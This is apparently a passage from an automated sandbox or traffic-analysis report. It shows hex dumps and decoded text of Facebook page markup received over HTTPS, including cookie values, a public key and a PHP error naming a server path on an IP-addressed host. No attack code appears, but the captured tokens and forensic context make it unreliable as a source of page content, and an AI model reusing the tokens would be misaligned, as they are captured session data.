activity\u003C\/p>\u003Cp class=\"_9o-m\">You can review your off-Facebook activity, which is a summary of activity that businesses and organizations share with us about your interactions with t
2022-10-07 13:59:49 UTC	1135	IN	Data Raw: 72 64 0d 0a 33 33 31 35 0d 0a 43 77 78 44 6c 35 45 5a 30 74 68 55 62 79 68 5f 44 38 63 47 69 2d 71 36 67 50 57 39 66 45 4d 43 6f 68 4e 56 6d 73 4a 6f 64 5f 76 68 42 35 4c 43 30 74 47 73 4e 51 4a 37 54 79 59 32 6b 38 72 36 74 78 6a 6c 36 66 74 4a 79 2d 58 68 4a 42 30 77 32 31 55 59 54 4d 4c 58 79 57 74 49 65 59 65 5a 39 71 75 35 6c 72 37 5a 56 7a 56 35 43 47 6f 50 6e 65 59 5f 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 Data Ascii: rd3315CwxDl5EZ0thUbyh_D8cGi-q6gPW9fEMCohNVmsJod_vhB5LC0tGsNQJ7TyY2k8r6txjl6ftJy-XhJB0w21UYTMLXyWtIeYeZ9qu5lr7ZVzV5CGoPneY_w\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca hre
2022-10-07 13:59:49 UTC	1137	IN	Data Raw: 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 71 4a 74 72 6f 49 36 42 4d 57 76 79 49 65 4f 4d 66 56 73 6a 77 32 35 31 4b 56 54 4a 32 58 55 43 46 6e 48 35 6c 52 79 7a 37 66 38 59 35 63 57 4f 6b 6e 4b 69 48 4f 4b 77 2d 32 52 6f 52 6b 58 62 41 78 65 44 66 33 63 48 33 36 59 71 36 2d 48 35 53 41 4d 57 Data Ascii: resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&h=AT1qJtroI6BMWvyIeOMfVsjw251KVTJ2XUCFnH5lRyz7f8Y5cWOknKiHOKw-2RoRkXbAxeDf3cH36Yq6-H5SAMW
2022-10-07 13:59:49 UTC	1138	IN	Data Raw: 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d Data Ascii: trolling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-
2022-10-07 13:59:49 UTC	1140	IN	Data Raw: 48 58 31 47 74 53 71 75 4b 32 48 5f 71 72 64 66 34 7a 72 34 6f 4c 67 33 57 30 45 37 75 31 32 53 7a 77 34 64 54 6d 5f 35 58 72 38 65 74 75 6b 35 56 46 35 73 57 6c 35 7a 4b 7a 72 74 6a 6e 74 55 74 67 56 67 4b 6f 43 7a 39 72 5f 46 77 46 36 50 41 4c 4c 63 43 35 7a 57 4b 54 58 52 44 61 61 51 42 54 6a 42 35 6f 70 6a 33 70 62 7a 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e Data Ascii: HX1GtSquK2H_qrdf4zr4oLg3W0E7u12Szw4dTm_5Xr8etuk5VF5sWl5zKzrtjntUtgVgKoCz9r_FwF6PALLcC5zWKTXRDaaQBTjB5opj3pbzw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.
2022-10-07 13:59:49 UTC	1141	IN	Data Raw: 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 37 38 45 69 67 68 38 71 58 69 4a 6b 72 5f 45 38 44 44 4b 4c 6d 30 38 57 6e 61 4b 64 32 64 73 79 51 67 5a 45 46 44 6d 76 78 4e 32 37 76 50 72 57 7a 74 55 6e 61 69 4c 30 79 4a 56 50 78 4d 7a 32 78 66 7a 57 78 6c 59 47 56 43 4d 30 5f 50 7a 6c 36 5f 6c 79 67 39 4a 73 71 69 4d 4e 44 67 4b 6c 6e 42 30 5f 6c 32 55 30 50 69 41 65 64 45 66 30 37 63 30 69 Data Ascii: hp?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&h=AT278Eigh8qXiJkr_E8DDKLm08WnaKd2dsyQgZEFDmvxN27vPrWztUnaiL0yJVPxMz2xfzWxlYGVCM0_Pzl6_lyg9JsqiMNDgKlnB0_l2U0PiAedEf07c0i
2022-10-07 13:59:49 UTC	1143	IN	Data Raw: 5f 36 5f 47 55 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 47 73 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 77 32 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 65 2b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4d 61 67 79 61 72 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 58 36 22 2c 7b 22 5f 5f 68 74 Data Ascii: _6_GU",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Gs",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_w2",{"__html":"Italiano"},1],["__markup_3310c079_0_9_e+",{"__html":"Magyar"},1],["__markup_3310c079_0_a_X6",{"__ht
2022-10-07 13:59:49 UTC	1144	IN	Data Raw: 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 45 71 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 70 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 32 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 30 37 32 62 Data Ascii: \u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_Eq",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_pM",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_3310c079_0_v_2h",{"__html":"\ud55c\uad6d\uc5b4"},1]],"elements":[["__elem_072b
2022-10-07 13:59:49 UTC	1146	IN	Data Raw: 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 Data Ascii: 02520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/s
2022-10-07 13:59:49 UTC	1147	IN	Data Raw: 30 37 5f 30 5f 30 5f 6f 63 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f 72 43 6c 69 63 6b 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 56 39 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 6f 63 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 56 39 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 6f 63 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c Data Ascii: 07_0_0_oc"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_45e94dd8_0_0_V9","__elem_a588f507_0_0_oc"],[[{"__m":"__elem_45e94dd8_0_0_V9"},{"__m":"__elem_a588f507_0_0_oc"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],
2022-10-07 13:59:49 UTC	1149	IN	Data Raw: 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 30 63 30 35 34 64 38 65 62 34 61 62 30 37 62 35 32 33 63 36 61 64 62 35 30 35 61 37 36 35 38 36 34 61 37 31 32 62 35 36 32 37 34 63 61 35 36 31 36 30 38 37 31 34 32 31 38 61 35 36 38 33 35 38 22 2c 22 6b 65 79 49 64 22 3a 34 30 7d 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 Data Ascii: ,true,{"pubKey":{"publicKey":"0c054d8eb4ab07b523c6adb505a765864a712b56274ca561608714218a568358","keyId":40}}]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["BrowserPrefillLogging","initP
2022-10-07 13:59:49 UTC	1150	IN	Data Raw: 29 3b 20 7d 20 63 61 74 63 68 20 28 5f 69 67 6e 6f 72 65 29 20 7b 20 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70 2e 6e 6f 77 26 26 70 2e 74 69 6d 69 6e 67 26 26 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 6e 6f 77 28 29 2b 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 Data Ascii: ); } catch (_ignore) { }});</script><script>now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipe
2022-10-07 13:59:49 UTC	1151	IN	Data Raw: 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 69 2f 72 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 47 52 65 62 35 33 68 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6e 2f 72 2f 47 32 6d 61 49 71 32 6b 57 43 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f Data Ascii: link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="GReb53he" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/G2maIq2kWCV.js?_nc_x=Ij3Wp8lg5Kz" as="script" no
2022-10-07 13:59:49 UTC	1152	IN	Data Raw: 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 47 52 65 62 35 33 68 65 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 47 52 65 62 35 33 Data Ascii: asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><script nonce="GReb53he">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();</script><script nonce="GReb53
2022-10-07 13:59:49 UTC	1154	IN	Data Raw: 3a 7b 64 65 66 69 6e 65 3a 5b 5b 22 54 69 6d 65 53 6c 69 63 65 49 6e 74 65 72 61 63 74 69 6f 6e 53 56 22 2c 5b 5d 2c 7b 6f 6e 5f 64 65 6d 61 6e 64 5f 72 65 66 65 72 65 6e 63 65 5f 63 6f 75 6e 74 69 6e 67 3a 74 72 75 65 2c 6f 6e 5f 64 65 6d 61 6e 64 5f 70 72 6f 66 69 6c 69 6e 67 5f 63 6f 75 6e 74 65 72 73 3a 74 72 75 65 2c 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 30 2c 6c 69 74 65 5f 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 6c 69 74 65 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 30 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 30 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 30 2c 45 76 65 6e 74 3a 31 7d 2c 69 6e 74 Data Ascii: :{define:[["TimeSliceInteractionSV",[],{on_demand_reference_counting:true,on_demand_profiling_counters:true,default_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:1},int
2022-10-07 13:59:49 UTC	1155	IN	Data Raw: 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 31 37 34 33 39 22 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 68 44 69 69 75 67 48 5a 6e 6d 31 47 6b 33 48 38 4f 64 4b 44 7a 64 5a 77 4e 2d 5a 50 73 52 6c 31 72 36 53 52 6a 4d 77 36 58 30 32 37 30 54 38 74 39 41 43 46 69 51 72 54 65 4c 30 30 70 7a 49 45 4f 2d 72 58 69 2d 48 4c 70 72 32 6f 4f 71 6f 73 75 39 4f 65 5f 76 47 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 38 38 35 37 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 42 4e 4f 67 58 6e 2d 51 51 31 4c 39 39 75 2d 31 4d 78 6f 39 42 33 45 74 39 66 47 32 36 36 54 59 6e 2d 6c 57 5f 71 58 32 68 6f 48 44 51 54 4f Data Ascii: Y"]},-1],["cr:917439",["PageTransitionsBlue"],{__rc:["PageTransitionsBlue","Aa2hDiiugHZnm1Gk3H8OdKDzdZwN-ZPsRl1r6SRjMw6X0270T8t9ACFiQrTeL00pzIEO-rXi-HLpr2oOqosu9Oe_vGY"]},-1],["cr:1108857",[],{__rc:[null,"Aa2BNOgXn-QQ1L99u-1Mxo9B3Et9fG266TYn-lW_qX2hoHDQTO
2022-10-07 13:59:49 UTC	1157	IN	Data Raw: 76 61 73 63 72 69 70 74 5f 74 72 61 63 65 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6c 6f 67 67 65 72 5f 64 61 74 61 22 2c 22 6c 6f 67 67 65 72 22 2c 22 66 61 6c 63 6f 22 2c 22 67 6b 32 5f 65 78 70 6f 73 75 72 65 22 2c 22 6a 73 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 22 2c 22 6c 6f 6f 6d 5f 74 72 61 63 65 22 2c 22 6d 61 72 61 75 64 65 72 22 2c 22 70 65 72 66 78 5f 63 75 73 74 6f 6d 5f 6c 6f 67 67 65 72 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 71 65 78 22 2c 22 72 65 71 75 69 72 65 5f 63 6f 6e 64 5f 65 78 70 6f 73 75 72 65 5f 6c 6f 67 67 69 6e 67 22 5d 2c 73 68 6f 75 6c 64 5f 64 72 6f 70 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 74 72 75 65 2c 73 68 6f 75 6c 64 5f 6c 6f 67 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 66 61 6c 73 65 7d 2c 37 5d 2c 5b 22 Data Ascii: vascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging"],should_drop_unknown_routes:true,should_log_unknown_routes:false},7],["
2022-10-07 13:59:49 UTC	1158	IN	Data Raw: 68 5f 30 63 72 39 67 69 6e 51 35 38 5f 31 54 31 53 6b 7a 4f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 33 33 35 39 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 2c 22 41 61 31 53 78 43 6c 52 74 6c 78 45 2d 49 6d 66 30 2d 4e 31 49 78 49 32 4a 53 43 69 37 37 67 65 73 6d 53 4a 56 63 57 53 47 79 74 7a 48 73 55 54 54 36 46 73 53 35 38 42 4c 47 55 6d 6f 63 50 36 44 54 30 39 69 79 77 55 65 46 62 6b 44 4b 31 34 7a 6b 48 30 35 30 6d 43 72 35 69 38 75 53 56 4b 65 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c Data Ascii: h_0cr9ginQ58_1T1SkzO"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerImplForBlue","Aa1SxClRtlxE-Imf0-N1IxI2JSCi77gesmSJVcWSGytzHsUTT6FsS58BLGUmocP6DT09iywUeFbkDK14zkH050mCr5i8uSVKeg"]},-1],["TrackingConfig",[],{domain:"https://pixel
2022-10-07 13:59:49 UTC	1160	IN	Data Raw: 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 Data Ascii: om/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/inclu
2022-10-07 13:59:49 UTC	1161	IN	Data Raw: 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 31 54 42 41 59 39 59 44 55 6f 49 59 55 4f 70 70 55 32 2d 34 74 33 71 34 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 Data Ascii: g",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","1TBAY9YDUoIYUOppU2-4t3q4",63072000000,"/",true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
